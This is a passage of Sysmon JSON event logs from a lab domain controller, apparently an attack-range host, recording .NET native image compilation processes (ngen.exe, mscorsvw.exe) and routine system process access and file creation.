C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.872","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-00109B0C1300}","TargetProcessId":"2820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-00109B0C1300}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-00109B0C1300}","TargetProcessId":"2820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-00109B0C1300}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-00109B0C1300}","TargetProcessId":"2820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:47.590\r\nProcessGuid: {A837DB8D-050E-5F25-0000-00109B0C1300}\r\nProcessId: 2820\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b04-0\\System.Drawing.dll\r\nCreationUtcTime: 2020-08-01 06:00:47.590","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:47.590","ProcessGuid":"{A837DB8D-050E-5F25-0000-00109B0C1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b04-0\\System.Drawing.dll","CreationUtcTime":"2020-08-01 06:00:47.590","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:47.653\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-050F-5F25-0000-00106F101300}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:47.653","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-050F-5F25-0000-00106F101300}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:47.653\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-050F-5F25-0000-00106F101300}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:47.653","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-050F-5F25-0000-00106F101300}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:47.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-050F-5F25-0000-00106F101300}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:47.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-050F-5F25-0000-00106F101300}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:47.950\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-050F-5F25-0000-001068141300}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:47.950","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-050F-5F25-0000-001068141300}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:47.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-050F-5F25-0000-001068141300}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 